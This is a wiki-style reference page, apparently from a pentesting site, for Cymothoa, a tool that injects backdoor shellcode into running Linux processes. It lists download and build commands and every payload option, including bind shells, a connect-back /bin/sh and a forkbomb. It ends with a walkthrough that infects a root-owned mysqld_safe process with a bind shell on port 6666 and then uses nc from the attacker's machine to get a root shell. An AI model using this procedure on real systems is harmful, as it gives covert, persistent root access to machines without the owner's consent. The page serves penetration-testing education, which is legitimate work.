Cymothoa
Jump to navigation
Jump to search
Description
Cymothoa is a stealth backdooring tool, that inject backdoor's shellcode into an existing process.
Installation
Backtrack
Backtrack 5 R2 already comes with Cymothoa installed, in /pentest/backdoors/cymothoa/.
From scratch
$ cd ~/src/ $ wget http://downloads.sourceforge.net/project/cymothoa/cymothoa-1-beta/cymothoa-1-beta.tar.gz $ tar xzvf cymothoa-1-beta.tar.gz $ cd cymothoa-1-beta/ $ make $ sudo make install
Usage
Syntax
cymothoa -p <pid> -s <shellcode_number> [options]
Options
Main options
- -p
- process pid
- -s
- shellcode number
- 0 - bind /bin/sh to the provided port (requires -y)
- 1 - bind /bin/sh + fork() to the provided port (requires -y) - izik <[email protected]>
- 2 - bind /bin/sh to tcp port with password authentication (requires -y -o)
- 3 - /bin/sh connect back (requires -x, -y)
- 4 - tcp socket proxy (requires -x -y -r) - Russell Sanford ([email protected])
- 5 - script execution (see the payload), creates a tmp file you must remove
- 6 - forks an HTTP Server on port tcp/8800 - http://xenomuta.tuxfamily.org/
- 7 - serial port busybox binding - [email protected] [email protected]
- 8 - forkbomb (just for fun...) - Kris Katterjohn
- 9 - open cd-rom loop (follows /dev/cdrom symlink) - [email protected]
- 10 - audio (knock knock knock) via /dev/dsp - Cody Tubbs ([email protected])
- 11 - POC alarm() scheduled shellcode
- 12 - POC setitimer() scheduled shellcode
- 13 - alarm() backdoor (requires -j -y) bind port, fork on accept
- 14 - setitimer() tail follow (requires -k -x -y) send data via upd
- -l
- memory region name for shellcode injection (default /lib/ld)
- search for "r-xp" permissions, see /proc/pid/maps...
- -m
- memory region name for persistent memory (default /lib/ld)
- search for "rw-p" permissions, see /proc/pid/maps...
- -h
- print this help screen
- -S
- list available shellcodes
Injection options (overwrite payload flags)
- -f
- fork parent process
- -F
- don't fork parent process
- -b
- create payload thread (probably you need also -F)
- -B
- don't create payload thread
- -w
- pass persistent memory address
- -W
- don't pass persistent memory address
- -a
- use alarm scheduler
- -A
- don't use alarm scheduler
- -t
- use setitimer scheduler
- -T
- don't use setitimer scheduler
Payload arguments
- -j
- set timer (seconds)
- -k
- set timer (microseconds)
- -x
- set the IP
- -y
- set the port number
- -r
- set the port number 2
- -z
- set the username (4 bytes)
- -o
- set the password (8 bytes)
- -c
- set the script code (ex: "#!/bin/sh\nls; exit 0")
- escape codes will not be interpreted
Usage
First install cymothoa on the victim's computer. Then check the process ID you want to infect (e.g. mysql, PID=1155)
victim:~/src/cymothoa-1-beta# ps aux | grep mysql root 1155 0.0 0.1 1752 568 ? S 21:39 0:00 /bin/sh /usr/bin/mysqld_safe mysql 1273 0.0 4.3 138744 22424 ? Sl 21:39 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306 root 1274 0.0 0.1 1676 560 ? S 21:39 0:00 logger -t mysqld -p daemon.error root 26975 0.0 0.1 3324 812 pts/0 S+ 21:53 0:00 grep mysql
Then infect the process:
victim:~/src/cymothoa-1-beta# ./cymothoa -p 1155 -s 0 -y 6666 [+] attaching to process 1155 register info: ----------------------------------------------------------- eax value: 0xfffffe00 ebx value: 0xffffffff esp value: 0xbfbfaffc eip value: 0xb7818424 ------------------------------------------------------------ [+] new esp: 0xbfbfaff8 [+] payload preamble: fork [+] injecting code into 0xb7819000 [+] copy general purpose registers [+] detaching from 1155 [+] infected!!!
On the attacker's machine, you should now be able to connect to port 6666:
root@bt:/pentest/backdoors/cymothoa# nc 192.168.1.18 6666 id uid=0(root) gid=0(root) groups=0(root)